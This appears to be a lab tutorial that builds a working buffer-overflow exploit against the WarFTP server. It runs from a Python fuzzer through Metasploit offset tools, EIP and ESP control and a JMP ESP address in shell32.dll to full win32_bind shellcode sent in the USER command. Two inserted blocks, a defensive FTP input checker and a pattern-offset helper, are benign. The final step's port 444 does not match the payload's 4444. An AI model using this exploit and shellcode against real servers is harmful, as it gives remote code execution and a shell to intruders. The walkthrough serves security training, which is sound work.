For this process we use the following tools:
1. Preparing tools
- OllyDbg as the debugger (download here)
- A fuzzer for the fuzzing process
- Python, which we will use to write the fuzzer and the exploit.
2. After downloading OllyDbg, install it on your Windows XP machine. You can see how to install OllyDbg in my previous lesson.
Then download WarFTP and install it on Windows.
3. After installing WarFTP you can see the picture below:
4. Now follow these steps :D
>>> Fuzzing
In every phase of vulnerability development, fuzzing is an early stage.
OK, we will create the fuzzer in Python.
Open KWrite and type the following script:
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5$
#buffer="\x41"*1000
# 485 bytes of NOP (0x90) followed by the 4-byte marker 0xDEADBEEF that should land in EIP
nilaiEIP=b"\x90" * 485
nilaiEIP+=b"\xEF\xBE\xAD\xDE"
s.connect(('192.168.56.101',21))
data=s.recv(1024)   # read the FTP banner
print("sending evil data via USER command..")
s.send(b'USER '+nilaiEIP+b'\r\n')
data=s.recv(1024)
s.send(b'PASS PASSWORD '+b'\r\n')
s.close()
print("Finish")
Save it with the .py extension, for example xfuzz.py.
5. Now run WarFTP: choose the menu Properties --> Start Service until the status becomes idle, then test the connection from the console with root@bt:~# nc 192.168.56.101 21
21 is the port WarFTP listens on.
6. Now we try running the fuzzer:
root@bt:~# python xfuzz.py
When you press enter, the nc connection stops and WarFTP on Windows stops: the application crashed while processing the data the fuzzer sent.
7. Now we will see what happens inside the application when we attack it with the fuzzer. Run OllyDbg and open WarFTP in it. When you run WarFTP again the application will show an error, so you must:
- Delete the file FTPdaemon.DAT
- Run the WarFTP server application again
- Create a dummy user through the user security settings
and run it again; look at the picture below:
--> Run WarFTP and start the service
then open OllyDbg and choose File -> Attach -> warftp -> Attach -> Start
Check: root@bt:~# nc 192.168.56.101 21
8. Run
root@bt:~# python xfuzz.py
Using OllyDbg we can see what happens to the registers of the WarFTP server. Four registers now hold data sent by the fuzzer:
ESP, EDI, EBP, EIP
All four contain the value 0x41, which is the letter A in ASCII.
----> In the normal situation
~The ESP register points to the stack, where the application's local variables are stored.
~WarFTP stores the data received via the USER command there.
~EIP then executes the next instruction of WarFTP, which directs execution to the memory address of the function that checks the user input.
~The function at that memory address checks the input, verifying whether that user exists on the system.
----> In the buffer overflow situation
~The ESP register is filled with data from the fuzzer; because there is too much data, it finally overwrites the address held by ESP with AAAA, or 0x41414141.
~Once ESP is overwritten, the data continues into the next register saved in memory, EBP, which is overwritten in the same way as ESP.
~After EBP is overwritten, the data overwrites the next register, EIP, and at this point the program crashes: the operating system tries to find the address held in EIP, which is AAAA or 0x41414141, taken from the 1000 bytes of the character A generated by the fuzzer.
In this situation an attacker has the opportunity to control the EIP register for their own purposes.
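The same crash is easy to spot from the defender's side of the wire. The following script is an added example, not code from the original post: it inspects FTP control-channel lines and flags USER/PASS arguments that are far too long, contain non-printable bytes, or repeat one byte many times, which is exactly what the 1000-byte buffer above looks like. The thresholds and the sample session are constructed assumptions.

```python
import re
import string

# Added example (not from the original post): a defender-side check over FTP control-channel
# lines. A legitimate USER or PASS argument is short and printable; the crashing input in
# the post is 1000 bytes of the same character. The thresholds below are assumptions.
MAX_ARG_LEN = 128          # USER/PASS arguments longer than this are suspicious
RUN_LEN = 16               # one byte repeated this many times in a row looks like filler or a sled
PRINTABLE = set(string.printable.encode("ascii"))
CHECKED_VERBS = (b"USER", b"PASS")


def inspect_ftp_command(line):
    """Return a list of findings for one FTP command line (bytes); empty means it looks benign."""
    findings = []
    stripped = line.rstrip(b"\r\n")
    verb, _, arg = stripped.partition(b" ")
    verb = verb.upper()
    if verb not in CHECKED_VERBS:
        return findings
    name = verb.decode("ascii")
    if len(arg) > MAX_ARG_LEN:
        findings.append("%s argument is %d bytes (limit %d)" % (name, len(arg), MAX_ARG_LEN))
    nonprintable = sum(1 for b in arg if b not in PRINTABLE)
    if nonprintable:
        findings.append("%s argument contains %d non-printable bytes" % (name, nonprintable))
    # (.)\1{15,} matches any single byte followed by at least 15 copies of itself
    run = re.search(rb"(.)\1{%d,}" % (RUN_LEN - 1), arg, re.DOTALL)
    if run:
        findings.append("%s argument repeats byte 0x%02x %d times"
                        % (name, run.group(1)[0], len(run.group(0))))
    return findings


def scan_session(lines):
    """Return [(index, findings)] for every line of a captured session that raised a finding."""
    flagged = []
    for i, line in enumerate(lines):
        findings = inspect_ftp_command(line)
        if findings:
            flagged.append((i, findings))
    return flagged


# Constructed sample session: two normal logins, then the two buffers used in the post.
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"USER " + b"A" * 1000 + b"\r\n",
    b"USER " + b"\x90" * 485 + b"\xef\xbe\xad\xde" + b"\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for index, findings in scan_session(SAMPLE_SESSION):
        print("line %d: %s" % (index, "; ".join(findings)))
```

Run over the constructed session, only lines 2 and 3 are flagged; the normal logins and QUIT pass through silently. The same three checks can be applied to USER lines pulled from a server log or from a packet capture.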
Now we must find out after how many bytes of the data sent by the fuzzer each register is overwritten.
We will use the Metasploit Framework.
One of the Metasploit tools we use is pattern_create. Why do we use pattern_create?
"To find the actual location of a unique string in the packet data transmitted by the fuzzer to the application."
9. root@bt:/pentest/exploits/framework/tools#
To generate 1000 bytes of pattern data, run the command
root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 1000 > string_pattern.txt
To view it, open it with KWrite.
After creating string_pattern.txt, put the string pattern into the buffer of the fuzzer application.
After that run WarFTP under OllyDbg again and look at the result:
Pay attention to the values in the ESP and EIP registers. The second register is very vital. ESP is also vital because when an attacker knows the address of the stack, they can place their payload code (backdoor, virus, trojan etc.) on the stack and have it executed by the system via the address stored in EIP. Because the space available on the stack is large enough, it is possible to store a payload such as a VNC client there.
After successfully crashing the application with the pattern data, the next step is to look at which bytes of the string overwrite the registers. For this we use a second tool, pattern_offset.
10. pattern_offset
The function of this tool is to calculate the number of bytes into the pattern generated by pattern_create.rb at which a given value appears. It is stored in the same folder as pattern_create.rb.
./pattern_offset.rb 32714131
result 485
./pattern_offset.rb q4Aq5Aq
result 493
We see that 485 bytes of data are needed to reach the EIP register and 493 bytes to reach the stack. From this we know that EIP is overwritten by 4 bytes: bytes 486, 487, 488 and 489. To prove that bytes 486, 487, 488 and 489 of the buffer sent by the fuzzer are the ones that overwrite EIP, the next step is to customize the fuzzer by changing the buffer and adding a variable for the EIP value.
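To show where the numbers 485 and 493 come from, here is an added re-implementation of pattern_create.rb and pattern_offset.rb in Python (example code, not the Metasploit tools themselves). The pattern is the sequence Aa0 Aa1 ... Aa9 Ab0 ... Zz9, so every 4-byte window occurs once, and a register value read from the debugger is reversed before searching because x86 stores it little-endian: 0x32714131 is the string "1Aq2" in memory. The helper eip_byte_positions is an assumption added only to spell out the 486..489 arithmetic.

```python
import string
import struct

# Added example (not Metasploit's own code): the cyclic pattern used by pattern_create.rb
# and the offset lookup done by pattern_offset.rb.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Return the first `length` characters of the cyclic pattern Aa0Aa1...Zz9."""
    chunks = []
    total = 0
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern longer than %d bytes is not unique" % total)


def pattern_offset(value, length=1000):
    """Offset of `value` inside pattern_create(length), or -1 if it is absent.

    `value` is either a fragment seen on the stack (e.g. "q4Aq5Aq") or a 32-bit register
    value as the debugger prints it (e.g. "32714131" for EIP). A register value is stored
    little-endian, so its bytes are reversed before searching: 0x32714131 -> "1Aq2".
    """
    pattern = pattern_create(length)
    idx = pattern.find(value)
    if idx == -1 and len(value) == 8 and all(c in string.hexdigits for c in value):
        as_str = struct.pack("<I", int(value, 16)).decode("ascii", errors="replace")
        idx = pattern.find(as_str)
    return idx


def eip_byte_positions(offset):
    """1-based positions of the four buffer bytes that land in EIP when the offset is `offset`."""
    return [offset + i for i in range(1, 5)]


if __name__ == "__main__":
    print("EIP 0x32714131 at offset", pattern_offset("32714131"))
    print("ESP fragment q4Aq5Aq at offset", pattern_offset("q4Aq5Aq"))
    print("bytes overwriting EIP:", eip_byte_positions(pattern_offset("32714131")))
```

With the 1000-byte pattern, "32714131" resolves to 485 and "q4Aq5Aq" to 493, matching the pattern_offset.rb output above, and the four bytes that overwrite EIP are positions 486 to 489.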
Run WarFTP under OllyDbg again, and:
root@bt:~# python xfuzz.py
11. Next we try writing to ESP, because ESP points to the temporary data storage in memory (the stack). If we succeed in overwriting the stack, we can place the PAYLOAD there. We customize the fuzzer script again:
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5$
#buffer="\x41"*1000
#nilaiEIP="\x90" * 485
#nilaiEIP+="\xEF\xBE\xAD\xDE"
buffer=b"\x90" * 485                    # 485 NOP bytes reach the saved EIP
buffer+=b"\xEF\xBE\xAD\xDE"             # the 4 bytes that overwrite EIP (bytes 486-489)
buffer+=b"\x90" * (493 - len(buffer))   # pad to 493 bytes, where ESP points
buffer+=b"\xCC" * (1000 - len(buffer))  # fill the rest with INT3 (0xCC) so the stack area is easy to see
s.connect(('192.168.56.101',21))
data=s.recv(1024)   # read the FTP banner
#print("sendingevildatavia USER command..")
#s.send('USER '+nilaiEIP+'\r\n')
#data=s.recv(1024)
#s.send('PASS PASSWORD '+'\r\n')
s.send(b'USER '+buffer+b'\r\n')
data=s.recv(1024)
s.send(b'PASS PASSWORD '+b'\r\n')
s.close()
#print("Finish")
Run WarFTP under OllyDbg again, then run the fuzzer and look at the result.
The next thing we do is find an address in the memory of the WarFTP server that jumps into the stack. We cannot put the stack address directly into EIP, so we use a "stepping stone" to get into the stack.
12. JMP ESP
Because EIP cannot access the buffer memory directly, we go through the ESP register, because ESP can access the buffer memory directly.
Register EIP -----> memory address holding the instruction JMP ESP ----> Register ESP ----> Buffer (stack) -----> execute PAYLOAD.
To search for JMP ESP in the application's memory, follow these steps:
1. Run the application under OllyDbg. In the View menu choose the sub-menu Executable modules.
2. The executable modules are shown.
3. Choose the library file that will serve as the springboard for the EIP register to enter the stack; we choose shell32.dll.
4. After choosing the library, double click the file and a new CPU window for that library opens.
5. The next step is to search for JMP ESP in the file.
Right click ------> Search for ----> Command, and a dialog appears.
6. Enter JMP ESP in the command box and press Find.
7. We can see that OllyDbg successfully found JMP ESP.
Note: the chosen memory address must not contain any of the bytes \x00, \x0a and \x0d, because they would break the payload.
8. Trying JMP ESP
Change the value 7C9D30D7 into \xD7\x30\x9D\x7C in your fuzzer script.
9. Run WarFTP under OllyDbg again
and
root@bt:~# python xfuzz.py
10. Open Metasploit to create the PAYLOAD
----> root@bt:/pentest/exploits/framework2# ./msfweb
---> Open the browser at
127.0.0.1:55555/payloads and choose PAYLOADS
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=ShikataGaNai http://metasploit.com */
unsigned char scode[] =
"\xd9\xc2\xd9\x74\x24\xf4\x31\xc9\xbe\x15\xfb\xf1\x70\xb1\x51\x5b"
"\x83\xc3\x04\x31\x73\x13\x03\x66\xe8\x13\x85\x74\x64\x3f\x2b\x6c"
"\x80\x40\x4b\x93\x13\x34\xd8\x4f\xf0\xc1\x64\xb3\x73\xa9\x63\xb3"
"\x82\xbd\xe7\x0c\x9d\xca\xa7\xb2\x9c\x27\x1e\x39\xaa\x3c\xa0\xd3"
"\xe2\x82\x3a\x87\x81\xc3\x49\xd0\x48\x09\xbc\xdf\x88\x65\x4b\xe4"
"\x58\x5e\x9c\x6f\x84\x15\x83\xab\x47\xc1\x5a\x38\x4b\x5e\x28\x61"
"\x48\x61\xc5\x9e\x5c\xea\x90\xcc\xb8\xf0\xc3\xcf\xf0\xd3\x60\x44"
"\xb1\xd3\xe3\x1a\x3a\x9f\x84\x86\xef\x14\x24\xbe\xb1\x42\x2b\xf0"
"\x43\x7f\x63\xf3\x8a\x19\xd7\x6d\x5b\xd5\xe5\x19\xec\x6a\x38\x86"
"\x46\x72\xec\x50\xac\x61\xf1\x9b\x62\x85\xdc\x84\x0b\x9c\x87\xbb"
"\xe1\x57\x4a\xee\x93\x65\xb5\xc0\x0c\xb3\x40\x15\x61\x14\xac\x03"
"\x29\xc8\x01\xf8\x9d\xad\xf6\xbd\x72\xcd\x29\x27\x1d\x20\x96\xc1"
"\x8e\xcb\xc7\x98\x59\x68\x1d\xd2\x5e\x27\xdd\xc4\x0b\xd8\x70\xbd"
"\x34\x08\x1a\x99\x66\x87\x32\xb6\x87\x0e\x97\x6d\x87\x7f\x70\x68"
"\x3e\x06\xc8\x25\x3e\xd0\x9b\x9d\x94\x88\xe4\xcd\x86\x5b\xfc\x94"
"\x6e\xe2\x55\x99\xb9\x40\xa5\xb5\x20\x01\x3d\x53\xc5\xb6\xd0\x12"
"\xf0\x53\x7b\x7d\xd2\x6f\xf2\x9a\x4e\x34\x8c\x86\xbe\x74\x7d\xec"
"\x3f\x36\xaf\x0e\xfd\x9b\x3c\x63\x78\xdc\xe9\xd0\xd6\x74\x9c\xd8"
"\x9a\x93\x9f\x51\x99\x64\x89\xc2\x76\xc9\x67\xa5\x29\x87\x86\x14"
"\x9b\x02\xd8\x69\xcb\xc5\x77\x4c\xe9\xdb\xdb\x91\x24\x89\x24\x92"
"\xfe\xb1\x0b\xe7\x56\xb2\x2f\x33\x3c\xb5\xe6\xe9\x42\x99\x6f\xfd"
"\x37\x1e\x2f\xae\xb8\xc9\x30\x80";
Or
buffer+="\xd9\xc1\x33\xc9\xb1\x51\xbb\x7c\xfd\x24\xb1\xd9\x74\x24\xf4\x5a"
buffer+="\x31\x5a\x17\x03\x5a\x17\x83\x96\x01\xc6\x44\x9a\x90\xec\xea\x8a"
buffer+="\x9c\x0c\x0b\xb5\x3f\x78\x98\x6d\xe4\xf5\x24\x51\x6f\x75\xa2\xd1"
buffer+="\x6e\x69\x27\x6e\x69\xfe\x67\x50\x88\xeb\xd1\x1b\xbe\x60\xe0\xf5"
buffer+="\x8e\xb6\x7a\xa5\x75\xf6\x09\xb2\xb4\x3d\xfc\xbd\xf4\x29\x0b\x86"
buffer+="\xac\x89\xdc\x8d\xa9\x59\x43\x49\x33\xb5\x1a\x1a\x3f\x02\x68\x43"
buffer+="\x5c\x95\x85\x78\x70\x1e\xd0\x12\xac\x3c\x82\x29\x9d\xe7\x20\x26"
buffer+="\x9d\x27\x22\x78\x2e\xc3\x44\x64\x83\x58\xe4\x9c\x85\x36\x6b\xd2"
buffer+="\x37\x2b\x23\x15\x91\xd5\x97\x8f\x76\x29\x2a\x27\xf0\x3e\x78\xe8"
buffer+="\xaa\x3f\xac\x7e\x98\x2d\xb1\x45\x4e\x51\x9c\xe6\xe7\x48\x47\x99"
buffer+="\x15\x9a\x8a\xcc\x8f\x99\x75\x3e\x27\x47\x80\x4b\x15\x20\x6c\x65"
buffer+="\x35\x9c\xc1\xda\xe9\x61\xb5\x9f\x5e\x99\xe9\x79\x09\x74\x56\xe3"
buffer+="\x9a\xff\x87\x7e\x74\xa4\x52\xf0\x42\xf3\x9d\x26\x26\xec\x30\x93"
buffer+="\x48\xdc\xdb\xbf\x1a\xf3\xf2\xe8\x9b\xda\x56\x43\x9b\x33\x30\x8e"
buffer+="\x2a\x32\x88\x07\x52\xec\x5b\xf3\xf8\x44\xa3\x2b\x93\x0f\xbc\xb2"
buffer+="\x52\xb6\x15\xbb\x8d\x1c\x65\x93\x54\xf5\xfd\x75\xf1\x6a\x93\xf0"
buffer+="\xe4\x07\x3b\x5b\xce\x1b\x32\xbc\x7a\xe0\xcc\xa0\x4a\x28\x3d\x8e"
buffer+="\x53\xea\xef\x30\xe9\xc7\x7c\x41\x94\x2f\x28\xf2\xc2\x38\x5c\xfa"
buffer+="\xa6\xaf\x5f\x77\x8d\x30\x49\x2c\x5a\x9d\x27\x83\x35\x4b\xc9\x72"
buffer+="\xe7\xde\x98\x8b\xd7\x89\xb7\xaa\xdd\x87\x9b\xb3\x08\x7d\xe3\xb4"
buffer+="\x82\x7d\xcb\xc1\xba\x7d\x6f\x11\x20\x81\xa6\xcb\x56\xad\x2f\x1b"
buffer+="\x22\x4a\xef\x88\xcc\x85\xf0\xfe"
Edit the fuzzer script configuration accordingly:
after that run WarFTP under OllyDbg and run the fuzzer,
then
run WarFTP under OllyDbg and run
root@bt:~# telnet 192.168.56.101 444
Note: "If you don't succeed with your PAYLOAD, you can try another PAYLOAD."
Refresh your PAYLOADS and you will get new PAYLOADS in Metasploit.
GOOD LUCK